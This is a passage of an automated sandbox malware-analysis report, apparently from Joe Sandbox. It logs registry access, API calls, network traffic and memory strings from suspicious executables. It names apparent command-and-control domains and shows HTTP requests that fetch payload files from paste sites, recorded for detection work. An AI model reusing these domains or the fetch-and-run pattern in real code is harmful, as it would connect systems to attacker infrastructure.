Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968D880 FindFirstFileExW,9_2_000001F5A968D880
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB848 FindFirstFileExW,14_2_00007FF6A54FB848
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0A4A0 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,16_2_00000173CFC0A4A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD880 FindFirstFileExW,16_2_00000173D03BD880
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B848 FindFirstFileExW,17_2_00007FF7D168B848
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A81C0 InternetCheckConnectionW,14_2_00007FF6A54A81C0
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A5440 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,14_2_00007FF6A54A5440
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1User-Agent: URL CheckerHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1User-Agent: MyUserAgentHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwR.txt HTTP/1.1User-Agent: MyUserAgentHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: pastesnap.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: wavepassage.cfd
Source: global trafficDNS traffic detected: DNS query: textbinvault.com
Source: global trafficDNS traffic detected: DNS query: securetextweb.cc
Source: lsass.exe, 00000039.00000002.2551418796.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518269296.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551807834.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000039.00000002.2551418796.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518269296.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551807834.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000039.00000000.1518163902.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000039.00000002.2551418796.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518269296.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551807834.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000039.00000000.1518365956.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551604515.0000017D2D493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000039.00000002.2551198865.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518163902.0000017D2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000039.00000002.2552911870.0000017D2D843000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000039.00000002.2550063001.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1517595833.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/country
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/countryNVIDIAAMDntdll.dllRtlGetVersionWindows
Source: powershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1554825743.000002006BAD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000039.00000002.2551418796.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518269296.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551807834.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000039.00000000.1518163902.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000039.00000000.1518315907.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000003D.00000000.1542652207.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001F.00000002.1514433357.000002005B8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2550063001.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1517595833.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: System-f4855f59e0.exe, Microsoft-f4855f59e0.exeString found in binary or memory: http://www.google.com
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: http://www.google.compowershell.exe
Source: svchost.exe, 00000010.00000002.2554873475.00000173CF9C7000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://CodeMastersHub.su/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://ExploreRussiaBeyond.ru/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ExploreRussiaBeyond.ru/Cx
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ExploreRussiaBeyond.ru/Vkf
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://FeelGoodForever.org.ru/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://FeelGoodForever.org.ru/Fx
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://FeelGoodForever.org.ru/IC=C
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://FeelGoodForever.org.ru/NkN
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://LearnToCodeWithUs.su/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://LearnToCodeWithUs.su/PDATA
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://LearnToCodeWithUs.su/n
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://RusTechHub.ru/
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://RusTechHub.ru/0
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://RusTechHub.ru/ath=C:
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://RussianTechInnovationHub.ru/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://SuccessFromWithin.ru/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://SuccessFromWithin.ru/Hkp
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://TechVenturesFromRussia.su/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://TechVenturesFromRussia.su/G
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://YourNextBigIdea.su/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://YourNextBigIdea.su/K
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://adorebeautyz.top/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adorebeautyz.top/SSOR_AR
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adorebeautyz.top/Wx
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adorebeautyz.top/h
Source: powershell.exe, 0000001F.00000002.1514433357.000002005B8C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: curl.exe, 0000003C.00000003.1547952894.0000023245FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/_Num
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org;
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgC:
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FB8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003C.00000003.1547952894.0000023245FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgW
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgwmic
Source: curl.exe, 0000003C.00000002.1548361165.0000023245FB8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003C.00000003.1547952894.0000023245FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgy
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://bluebullet.su/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bluebullet.su/g
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://brettdogecoin.com/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brettdogecoin.com/Eh
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brettdogecoin.com/t
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://burningspice.cfd/
